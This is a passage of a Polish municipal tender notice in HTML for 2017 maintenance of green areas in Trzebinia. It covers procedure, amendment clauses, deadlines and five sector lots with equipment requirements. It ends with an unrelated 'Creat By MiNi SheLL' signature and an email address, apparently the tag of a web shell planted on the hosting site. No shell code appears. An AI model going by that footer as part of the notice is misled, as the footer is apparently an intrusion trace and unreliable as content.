   f)W przypadku gdy Wykonawca zamierza  powierzyć wykonanie części zamówienia
      podwykonawcy, który nie jest podmiotem, na którego zdolnościach wykonawca polega na
      zasadach określonych w art. 22a pzp  ustawy. na wezwanie  Zamawiającego przedłoży dokument 
      wskazany pkt.6.1 ppkt.a .
    g ) Oświadczenie wykonawcy o przynależności albo braku przynależności do tej samej grupy
       kapitałowej -należy złożyć bez wezwania zamawiającego w terminie 3 dni 
      od dnia zamieszczenia na stronie  internetowej  (www. trzebinia.pl/ Biuletyn Informacji
      Publicznej)  informacji podanych w dniu otwarcia ofert zgodnie z art. 86 ust.5 ustawy pzp.
      Informację należy złożyć w Biurze Zamówień  Publicznych Urzędu Miasta w Trzebini ul.
      Marszałka Piłsudskiego 14a, pok. nr 6.</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena </td><td>100.00</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />17.1.Zakazuje się zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, chyba że zachodzi co najmniej jedna z następujących okoliczności: 
1) zmiany zostały przewidziane w ogłoszeniu o zamówieniu lub specyfikacji istotnych warunków
    zamówienia w postaci jednoznacznych postanowień umownych, które określają ich zakres, w
   szczególności możliwość zmiany wysokości wynagrodzenia wykonawcy, i charakter oraz warunki
   wprowadzenia zmian;
2) zmiany dotyczą realizacji dodatkowych dostaw, usług lub robót budowlanych od dotychczasowego
    wykonawcy, nieobjętych zamówieniem podstawowym, o ile stały się niezbędne i zostały spełnione
    łącznie następujące warunki: 
a) zmiana wykonawcy nie może zostać dokonana z powodów ekonomicznych lub technicznych, 
   w szczególności dotyczących zamienności lub interoperacyjności sprzętu, usług lub instalacji,
   zamówionych w ramach zamówienia podstawowego, 
b)zmiana wykonawcy spowodowałaby istotną niedogodność lub znaczne zwiększenie kosztów dla
    zamawiającego, 
c) wartość każdej kolejnej zmiany nie przekracza 50% wartości zamówienia określonej pierwotnie 
    w umowie lub umowie ramowej; 
3) zostały spełnione łącznie następujące warunki: 
a) konieczność zmiany umowy lub umowy ramowej spowodowana jest okolicznościami, których 
    zamawiający, działając z należytą starannością, nie mógł przewidzieć, 
b) wartość zmiany nie przekracza 50% wartości zamówienia określonej pierwotnie w umowie lub 
 umowie ramowej; 
4) wykonawcę, któremu zamawiający udzielił zamówienia, ma zastąpić nowy wykonawca: 
a) na podstawie postanowień umownych, o których mowa w pkt. 1, 
b) w wyniku połączenia, podziału, przekształcenia, upadłości, restrukturyzacji lub nabycia dotychczasowego wykonawcy lub jego przedsiębiorstwa, o ile nowy wykonawca spełnia warunki udziału w postępowaniu, nie zachodzą wobec niego podstawy wykluczenia oraz nie pociąga to za sobą innych istotnych zmian umowy, 
c)w wyniku przejęcia przez zamawiającego zobowiązań wykonawcy względem jego
podwykonawców; 
5) zmiany, niezależnie od ich wartości, nie są istotne w rozumieniu ust. 1e ustawy Pzp. 
6) łączna wartość zmian jest mniejsza niż kwoty określone w przepisach wydanych na podstawie art. 11 ust. 8 i jest mniejsza od 10% wartości zamówienia określonej pierwotnie w umowie w przypadku zamówień na usługi lub dostawy albo, w przypadku zamówień na roboty budowlane  jest mniejsza od 15% wartości zamówienia określonej pierwotnie w umowie.
17.2 Zmiany w umowie dotyczyć mogą również zmiany Kluczowego personelu Wykonawcy lub Zamawiającego oraz podwykonawców  w przypadku zaistnienia okoliczności uzasadniających zmianę (np. stan zdrowia, rezygnacja z pracy, likwidacja firmy podwykonawcy).
Jeżeli zmiana lub rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 22a ust. 1 Pzp, w celu wykazania spełnienia warunków udziału w postępowaniu, Wykonawca jest obowiązany wykazać Zamawiającemu, że proponowany inny podwykonawca lub wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż podwykonawca na którego zasoby Wykonawca powoływał się w trakcie postępowania o udzielenie zamówienia.
Zmiany w treści umowy o których mowa w ppkt. 17.1 i 17.2 wymagają aneksu sporządzonego                          z zachowaniem formy pisemnej pod rygorem nieważności i mogą zostać wprowadzone                                w przypadku, gdy strony zgodnie uznają, że zaszły wskazane  powyżej okoliczności oraz wprowadzenie zmian jest  niezbędne dla prawidłowej realizacji zamówienia.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 08/02/2017, godzina: 10:30,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              PL<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>A
                  
                <b>Nazwa: </b>Utrzymanie terenów zieleni miejskiej w Gminie Trzebinia  w 2017 r.  sektor A na pow.  13,84 ha<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Utrzymanie terenów zieleni miejskiej w Gminie Trzebinia
 w 2017 r. w sektorze A na pow.  13,84 ha<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>77300000-3, 77310000-6,
                    77313000-7,
                    90511300-5<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena </td><td>100.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykażą, że:
- wykonali lub wykonują  należycie min. 2 usługi polegające na  pielęgnacji zieleni na powierzchni nie mniejszej łącznie niż 7 ha w jednym okresie wegetacyjnym tzn. przez co najmniej sześć miesięcy w okresie ostatnich 3 lat, a jeżeli okres prowadzenia jest krótszy to w tym okresie.
oraz 
- dysponują min. 4 osobami do  bezpośredniej realizacji przedmiotu zamówienia określonego w pkt. 3 siwz ( dla każdego sektora osobno).
oraz dysponują min. jedną osobą (np. brygadzistą)  posiadającą wykształcenie wyższe lub średnie o profilu zgodnym z przedmiotem zamówienie (np. ogrodnicze, architektura krajobrazu) jako osobą nadzorującą pracę osób bezpośrednio zaangażowanych przy realizacji zamówienia
oraz dysponują 
- dla sektora A 
min.: trzema kosiarkami spalinowymi, jedną piłą mechaniczną, jednymi nożycami spalinowymi i dwoma szt. nożyc ręcznych (do żywopłotów), czterema kosami spalinowymi,  jedną dmuchawą do liści, jednym ciągnikiem rolniczym z przyczepą lub samochodem ciężarowym o ładowności do 3,5 t. oraz narzędziami ręcznymi typu: szpadle, grabie, motyczki, sekatory itp.
<br /></div></div><br /></div><div><b>Część nr: </b>B
                  
                <b>Nazwa: </b>Utrzymanie terenów zieleni miejskiej w Gminie Trzebinia  w 2017 r. w sektorze B na pow.  8,35 ha<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Utrzymanie terenów zieleni miejskiej w Gminie Trzebinia
 w 2017 r. w sektorze B na pow.  8,35 ha<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>77300000-3, 77310000-6,
                    77313000-7,
                    90511300-5<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena </td><td>100.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykażą, że:
- wykonali lub wykonują  należycie min. 2 usługi polegające na  pielęgnacji zieleni na powierzchni nie mniejszej łącznie niż 7 ha w jednym okresie wegetacyjnym tzn. przez co najmniej sześć miesięcy w okresie ostatnich 3 lat, a jeżeli okres prowadzenia jest krótszy to w tym okresie.
oraz 
- dysponują min. 4 osobami do  bezpośredniej realizacji przedmiotu zamówienia określonego w pkt. 3 siwz ( dla każdego sektora osobno).
oraz dysponują min. jedną osobą (np. brygadzistą)  posiadającą wykształcenie wyższe lub średnie o profilu zgodnym z przedmiotem zamówienie (np. ogrodnicze, architektura krajobrazu) jako osobą nadzorującą pracę osób bezpośrednio zaangażowanych przy realizacji zamówienia
oraz dysponują 

- dla sektora B 
min.: dwoma kosiarkami spalinowymi, jedną piłą mechaniczną, jednymi nożycami spalinowymi i jedną szt. nożyc ręcznych (do żywopłotów), trzema kosami spalinowymi, jedną dmuchawę do liści, jednym ciągnikiem rolniczym z przyczepą lub samochodem ciężarowym o ładowności do 3,5 t. oraz narzędziami ręcznymi typu: szpadle, grabie, motyczki, sekatory itp.
<br /></div></div><br /></div><div><b>Część nr: </b>C
                  
                <b>Nazwa: </b>Utrzymanie terenów zieleni miejskiej w Gminie Trzebinia  w 2017 r. w sektorze C na pow.  9,16 ha<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Utrzymanie terenów zieleni miejskiej w Gminie Trzebinia
 w 2017 r. w sektorze C na pow.  9,16 ha<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>77300000-3, 77310000-6,
                    77313000-7,
                    90511300-5<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>100.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykażą, że:
- wykonali lub wykonują  należycie min. 2 usługi polegające na  pielęgnacji zieleni na powierzchni nie mniejszej łącznie niż 7 ha w jednym okresie wegetacyjnym tzn. przez co najmniej sześć miesięcy w okresie ostatnich 3 lat, a jeżeli okres prowadzenia jest krótszy to w tym okresie.
oraz 
- dysponują min. 4 osobami do  bezpośredniej realizacji przedmiotu zamówienia określonego w pkt. 3 siwz ( dla każdego sektora osobno).
oraz dysponują min. jedną osobą (np. brygadzistą)  posiadającą wykształcenie wyższe lub średnie o profilu zgodnym z przedmiotem zamówienie (np. ogrodnicze, architektura krajobrazu) jako osobą nadzorującą pracę osób bezpośrednio zaangażowanych przy realizacji zamówienia
oraz dysponują 
 - dla sektora C 
min.: dwoma kosiarkami spalinowymi, jedną piłę mechaniczną, jednymi nożycami spalinowymi i dwoma szt. nożyc ręcznych (do żywopłotów), trzema kosami spalinowymi, jednym opryskiwaczem plecakowym, jedną dmuchawą do liści, jednym ciągnikiem rolniczym z przyczepą lub samochodem ciężarowym o ładowności do 3,5 t. oraz narzędziami ręcznymi typu: szpadle, grabie, motyczki, sekatory itp.
<br /></div></div><br /></div><div><b>Część nr: </b>D
                  
                <b>Nazwa: </b>Utrzymanie terenów zieleni miejskiej w Gminie Trzebinia  w 2017 r. w sektorze D na pow.  10,57 ha<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Utrzymanie terenów zieleni miejskiej w Gminie Trzebinia
 w 2017 r. w sektorze D na pow.  10,57 ha<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>77300000-3, 77310000-6,
                    77313000-7,
                    90511300-5<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>100.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykażą, że:
- wykonali lub wykonują  należycie min. 2 usługi polegające na  pielęgnacji zieleni na powierzchni nie mniejszej łącznie niż 7 ha w jednym okresie wegetacyjnym tzn. przez co najmniej sześć miesięcy w okresie ostatnich 3 lat, a jeżeli okres prowadzenia jest krótszy to w tym okresie.
oraz 
- dysponują min. 4 osobami do  bezpośredniej realizacji przedmiotu zamówienia określonego w pkt. 3 siwz ( dla każdego sektora osobno).
oraz dysponują min. jedną osobą (np. brygadzistą)  posiadającą wykształcenie wyższe lub średnie o profilu zgodnym z przedmiotem zamówienie (np. ogrodnicze, architektura krajobrazu) jako osobą nadzorującą pracę osób bezpośrednio zaangażowanych przy realizacji zamówienia
oraz dysponują - dla sektora D 
min.: dwoma kosiarkami spalinowymi, jedną piłą mechaniczną, jednymi nożycami spalinowymi i dwoma szt. nożyc ręcznych (do żywopłotów), trzema kosami spalinowymi, jednym opryskiwaczem plecakowym, jedną dmuchawę do liści, jednym ciągnikiem rolniczym z przyczepą lub samochodem ciężarowym o ładowności do3,5 t. oraz narzędziami ręcznymi typu: szpadle, grabie, motyczki, sekatory itp.

<br /></div></div><br /></div><div><b>Część nr: </b>E
                  
                <b>Nazwa: </b>Utrzymanie terenów zieleni miejskiej w Gminie Trzebinia  w 2017 r. w sektorze E na pow.  0,21 ha<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Utrzymanie terenów zieleni miejskiej w Gminie Trzebinia
 w 2017 r. w sektorze E na pow.  0,21 ha<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>77300000-3, 77310000-6,
                    77313000-7,
                    90511300-5<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>100.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykażą, że:
- wykonali lub wykonują  należycie min. 2 usługi polegające na  pielęgnacji zieleni na powierzchni nie mniejszej łącznie niż 7 ha w jednym okresie wegetacyjnym tzn. przez co najmniej sześć miesięcy w okresie ostatnich 3 lat, a jeżeli okres prowadzenia jest krótszy to w tym okresie.
oraz 
- dysponują min. 4 osobami do  bezpośredniej realizacji przedmiotu zamówienia określonego w pkt. 3 siwz ( dla każdego sektora osobno).
oraz dysponują min. jedną osobą (np. brygadzistą)  posiadającą wykształcenie wyższe lub średnie o profilu zgodnym z przedmiotem zamówienie (np. ogrodnicze, architektura krajobrazu) jako osobą nadzorującą pracę osób bezpośrednio zaangażowanych przy realizacji zamówienia
oraz dysponują  - dla sektora E 
min.: jedną kosiarką spalinową, jedną piłą mechaniczną, jednymi nożycami spalinowymi i jedną szt. nożyc ręcznych (do żywopłotów), jedną kosą spalinową, jedną dmuchawą do liści, jednym ciągnikiem rolniczym z przyczepą lub samochodem ciężarowym o ładowności do3,5 t. oraz narzędziami ręcznymi typu: szpadle, grabie, motyczki, sekatory itp.
<br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com